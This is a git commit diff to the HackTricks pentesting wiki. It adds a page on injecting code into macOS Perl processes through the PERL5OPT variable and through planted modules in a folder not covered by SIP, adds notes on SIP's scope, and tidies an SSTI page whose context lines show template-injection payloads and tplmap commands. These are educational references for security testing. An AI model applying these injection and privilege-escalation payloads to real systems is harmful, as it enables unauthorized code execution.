GITBOOK-4173: change request with no subject merged in GitBook

2023-12-04 09:24:40 +00:00 · 2023-12-04 09:24:40 +00:00 · ae3c6e44b7
parent 9275537ffe
commit ae3c6e44b7
6 changed files with 109 additions and 4 deletions
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/SUMMARY.md
+++ b/SUMMARY.md
@ -174,9 +174,10 @@
          * [macOS PID Reuse](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md)
          * [macOS xpc\_connection\_get\_audit\_token Attack](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc\_connection\_get\_audit\_token-attack.md)
      * [macOS Thread Injection via Task port](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md)
-    * [macOS Java apps Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md)
+    * [macOS Java Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.md)
    * [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
      * [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
+    * [macOS Perl Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md)
    * [macOS .Net Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md)
  * [macOS Security Protections](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md)
    * [macOS Gatekeeper / Quarantine / XProtect](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md)
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/README.md
@ -72,6 +72,14 @@ It's possible to inject code into .Net applications by **abusing the .Net debugg
 [macos-.net-applications-injection.md](macos-.net-applications-injection.md)
 {% endcontent-ref %}

+### Perl Injection
+
+Check different options to make a Perl script execute arbitrary code in:
+
+{% content-ref url="macos-perl-applications-injection.md" %}
+[macos-perl-applications-injection.md](macos-perl-applications-injection.md)
+{% endcontent-ref %}
+
 ### Python Injection

 If the environment variable **`PYTHONINSPECT`** is set, the python process will drop into a python cli once it's finished.
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md
@ -0,0 +1,76 @@
+# macOS Perl Applications Injection
+
+<details>
+
+<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>
+
+## Via `PERL5OPT` env variable
+
+Using the env variable PERL5OPT it's possible to make perl execute arbitrary commands.\
+For example, create this script:
+
+{% code title="test.pl" %}
+```perl
+#!/usr/bin/perl
+print "Hello from the Perl script!\n";
+```
+{% endcode %}
+
+Now **export the env variable** and execute the **perl** script:
+
+```bash
+export PERL5OPT='-Mwarnings;system("whoami")'
+perl test.pl # This will execute "whoami"
+```
+
+## Via dependencies
+
+It's possible to list the dependencies folder order of Perl running:
+
+```bash
+perl -e 'print join("\n", @INC)'
+```
+
+Which will return something like:
+
+```bash
+/Library/Perl/5.30/darwin-thread-multi-2level
+/Library/Perl/5.30
+/Network/Library/Perl/5.30/darwin-thread-multi-2level
+/Network/Library/Perl/5.30
+/Library/Perl/Updates/5.30.3
+/System/Library/Perl/5.30/darwin-thread-multi-2level
+/System/Library/Perl/5.30
+/System/Library/Perl/Extras/5.30/darwin-thread-multi-2level
+/System/Library/Perl/Extras/5.30
+```
+
+Some of the returned folders doesn't even exist, however, **`/Library/Perl/5.30`** does **exist**, it's **not** **protected** by **SIP** and it's **before** the folders **protected by SIP**. Therefore, someone could abuse that folder to add script dependencies in there so a high privilege Perl script will load it.
+
+However, note that you **need to be root to write in that folder**.
+
+For example, if a script is importing **`use File::Basename;`** it would be possible to create `/Library/Perl/5.30/File/Basename.pm` to make it execute arbitrary code.
+
+## References
+
+* [https://www.youtube.com/watch?v=zxZesAN-TEk](https://www.youtube.com/watch?v=zxZesAN-TEk)
+
+<details>
+
+<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+
+</details>
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
@ -52,6 +52,19 @@ drwxr-xr-x  338 root  wheel  restricted 10816 May 13 00:29 /usr/libexec

 Here, the **`restricted`** flag indicates that the `/usr/libexec` directory is protected by SIP. In a SIP-protected directory, files cannot be created, modified, or deleted.

+Moreover, if a file contains the attribute **`com.apple.rootless`** extended **attribute**, that file will also be **protected by SIP**.
+
+**SIP also limits other root actions** like:
+
+* Loading untrusted kernel extensions
+* Getting task-ports for Apple-signed processes
+* Modifying NVRAM variables
+* Allowing kernel debugging
+
+Options are maintained in nvram variable as a bitflag (`csr-active-config` on Intel and `lp-sip0` is read from the booted Device Tree for ARM). You can find the flags in the XNU source code in `csr.sh`:
+
+<figure><img src="../../../.gitbook/assets/image (720).png" alt=""><figcaption></figcaption></figure>
+
 ### SIP Status

 You can check if SIP is enabled on your system with the following command:
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@ -115,6 +115,7 @@ At this point you should have a **firm idea of the attack surface available** to
 ## Tools

 ### [TInjA](https://github.com/Hackmanit/TInjA)
+
 an efficient SSTI + CSTI scanner which utilizes novel polyglots

 ```bash
@ -130,7 +131,8 @@ python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomm
 python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade
 ```

-### [Template Injection Table](https://github.com/Hackmanit/template-injection-table) 
+### [Template Injection Table](https://github.com/Hackmanit/template-injection-table)
+
 an interactive table containing the most efficient template injection polyglots along with the expected responses of the 44 most important template engines.

 ## Exploits
@ -337,6 +339,7 @@ New version of Pebble :
 {% endraw %}


+
 {% set bytes = (1).TYPE
     .forName('java.lang.Runtime')
     .methods[6]
@ -848,6 +851,7 @@ Check out the following page to learn tricks about **arbitrary command execution



+
 {{os.system('whoami')}}
 {{os.system('whoami')}}
 ```
@ -878,6 +882,7 @@ Check out the following page to learn tricks about **arbitrary command execution



+
 {{settings.SECRET_KEY}}
 {{4*4}}[[5*5]]
 {{7*'7'}} would result in 7777777
@ -1028,9 +1033,11 @@ If you think it could be useful, read:

 ## Tools

-{% embed url="https://github.com/Hackmanit/TInjA" %}  
+{% embed url="https://github.com/Hackmanit/TInjA" %}
+
 {% embed url="https://github.com/epinna/tplmap" %}
-{% embed url="https://github.com/Hackmanit/template-injection-table" %}  
+
+{% embed url="https://github.com/Hackmanit/template-injection-table" %}

 ## Brute-Force Detection List